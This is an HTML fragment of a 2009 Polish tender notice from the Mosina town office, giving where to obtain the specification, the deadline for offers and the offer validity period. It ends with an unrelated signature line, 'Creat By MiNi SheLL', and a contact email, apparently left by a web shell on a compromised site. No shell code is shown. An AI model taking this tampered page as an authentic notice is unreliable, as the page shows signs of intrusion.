<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mosina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mosinie, pl. 20 Października 1, 62-050 Mosina.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2009 godzina 10:25, miejsce: Urząd Miejski w Mosinie, pl. 20 Października 1, 62-050 Mosina, pokój nr 107.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com